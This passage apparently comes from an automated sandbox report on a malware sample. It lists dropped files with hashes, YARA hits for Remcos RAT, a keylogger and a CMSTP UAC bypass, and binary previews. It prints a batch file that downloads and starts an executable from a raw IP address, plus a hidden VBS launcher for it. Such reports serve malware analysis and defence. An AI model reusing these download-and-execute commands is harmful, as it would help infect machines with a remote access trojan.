                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\mdvbfllr, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):500224
                      Entropy (8bit):6.590620352205087
                      Encrypted:false
                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\vqqcre, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                      Category:dropped
                      Size (bytes):890
                      Entropy (8bit):5.066228614804709
                      Encrypted:false
                      SSDEEP:24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
                      MD5:D0AC5B93F6CDFE282AAA6194C5A10F1C
                      SHA1:FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
                      SHA-256:E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
                      SHA-512:1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
                      Malicious:false
                      Preview:L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                      Process:C:\Windows\SysWOW64\cmd.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):500224
                      Entropy (8bit):6.590620352205087
                      Encrypted:false
                      SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                      MD5:6CA401F82443B673FCA7D7DDB0A05357
                      SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                      SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                      SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security
                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security
                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: Joe Security
                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: unknown
                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: unknown
                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\yigmovm, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):4809996
                      Entropy (8bit):7.988259707956486
                      Encrypted:false
                      SSDEEP:98304:+pbYDHaUeRG/GnYDievJRVrQo4QGB0s53+sTH7/93veWGLRHHk:+pbu9e+qYDiQf1hfGWsBVb/rGLhE
                      MD5:25860926414BF43383246F7C773A8D6C
                      SHA1:760390A4A14DF085F4C841067F52C79409CDC93E
                      SHA-256:A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
                      SHA-512:61825EF1B03F5516F2820FAAE3DAD01911054DEBB714B2162FD28CDC7C26199EB6174EDDB3E48A4B200C350A083A561A58BD2724496FCB71E87D4492E2EC5A07
                      Malicious:true
                      Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .
                      Process:C:\Windows\System32\svchost.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                      Category:dropped
                      Size (bytes):890
                      Entropy (8bit):5.066228614804709
                      Encrypted:false
                      SSDEEP:24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
                      MD5:D0AC5B93F6CDFE282AAA6194C5A10F1C
                      SHA1:FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
                      SHA-256:E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
                      SHA-512:1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
                      Malicious:false
                      Preview:L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 13:04:04 2024, mtime=Wed Sep 25 13:04:04 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                      Category:dropped
                      Size (bytes):890
                      Entropy (8bit):5.066228614804709
                      Encrypted:false
                      SSDEEP:24:8SqYt6DDalXUfloI8LxdsAH8HnumtzRm:8SDt6DDalkoI8Lr9mtl
                      MD5:D0AC5B93F6CDFE282AAA6194C5A10F1C
                      SHA1:FF08B9FA987FA7BD5043FC9DE3ADCC5B8156E484
                      SHA-256:E7F5CBDE249807D10A5489F65C4ABAB6CBEFC79D487BFEE948784141C3BD82D0
                      SHA-512:1901907C679685C47352993CCA33643A08DD6FA069AF2EEED3661AE5F2E79A9614B5D5D903AE6C590B1E0E5E0F36CBEF9B2DFDD841C24E4834C12C28B11C31B5
                      Malicious:false
                      Preview:L..................F.... ....p..S...@F..S.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S....X9.S...i..S.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Ybp...........................^.A.p.p.D.a.t.a...B.V.1.....9Y.p..Roaming.@......EW<29Y.p..../.....................c\..R.o.a.m.i.n.g.....b.1.....9Y.p..RUY_DR~1..J......9Y.p9Y.p.............................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y.p9Y.p..........................d...D.Z.I.P.R...e.x.e.......g...............-.......f...........D4.O.....C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......506013...........hT..CrF.f4... .....G{...-...-$..hT..CrF.f4... .....G{...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                      Process:C:\Users\user\DZIPR.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):354304
                      Entropy (8bit):6.005348176071358
                      Encrypted:false
                      SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                      MD5:AD28D4167571382569D2384FFD7BD2A9
                      SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                      SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                      SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                      Malicious:true
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\DZIPR.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):8767704
                      Entropy (8bit):7.112848215947183
                      Encrypted:false
                      SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                      MD5:EC9CE1D67F98072281015C7726FBA245
                      SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                      SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                      SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................
                      Process:C:\Users\user\DZIPR.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):975374
                      Entropy (8bit):7.888212877886324
                      Encrypted:false
                      SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                      MD5:4649F3A4E58C6040B07F6D486C149A71
                      SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                      SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                      SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                      Malicious:false
                      Preview:...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...
                      Process:C:\Users\user\DZIPR.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):72329
                      Entropy (8bit):4.4816230098296295
                      Encrypted:false
                      SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                      MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                      SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                      SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                      SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                      Malicious:false
                      Preview:]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):116
                      Entropy (8bit):4.962458979597571
                      Encrypted:false
                      SSDEEP:3:mKDDGKSSJJFSpXLgLvzx0fyJAFAkKiv5iwW0r+KBpkiv5iwW0rv:hSGmp6vd0fy78ha0rhppha0rv
                      MD5:174D3AD77319DC90564354CAD267DABF
                      SHA1:B36284DCCF4F4D2A7E671D5A2F9DDA8197A4C351
                      SHA-256:CE2A0FA3EF54C0596A6AA5E4D9E2F06943F0F7E38841823072BD37DF73C47569
                      SHA-512:FA78883AF47A9B47D738DD8ACC2990A3CBA9339B8A762A7AC98114810A50F9085D223226D00944D814FCE5FF43114BC87656AFAF752D86AE08A8818B257A40FB
                      Malicious:true
                      Preview:@echo off..powershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exe..start %APPDATA%/AUGUST.exe..
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):126
                      Entropy (8bit):4.948021064615188
                      Encrypted:false
                      SSDEEP:3:jaPFEm8nByK2qQANX4E71wivDWMZcNUqJajaPOUC:j6NqEK20XNNbWMiNUqOUC
                      MD5:CAA7E3E2DB71FA6B41370A69D134FDBA
                      SHA1:659CEC895D5348E9E1B85823CC9A8F0E165F21CF
                      SHA-256:183E1E3B20EA35804DDF2D6102AA4E854730A93F076BB6FE43075B0394D18945
                      SHA-512:346F1858A1861D16BF8E858867DEAA1653124085C0C320A2776C1A8131E93E6AF15156EC6B8457B3648F837485AD4EAC584EE83B859F97CBAA80F38B2BF68EFD
                      Malicious:true
                      Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0..Set WshShell = Nothing
                      Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):354304
                      Entropy (8bit):6.005348176071358
                      Encrypted:false
                      SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                      MD5:AD28D4167571382569D2384FFD7BD2A9
                      SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                      SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                      SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                      Malicious:true
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):8767704
                      Entropy (8bit):7.112848215947183
                      Encrypted:false
                      SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                      MD5:EC9CE1D67F98072281015C7726FBA245
                      SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                      SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                      SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                      Malicious:true
                      Yara Hits:
                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 0%
                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................
                      Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):975374
                      Entropy (8bit):7.888212877886324
                      Encrypted:false
                      SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                      MD5:4649F3A4E58C6040B07F6D486C149A71
                      SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                      SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                      SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                      Malicious:false
                      Preview:...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...
                      Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):72329
                      Entropy (8bit):4.4816230098296295
                      Encrypted:false
                      SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                      MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                      SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                      SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                      SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                      Malicious:false
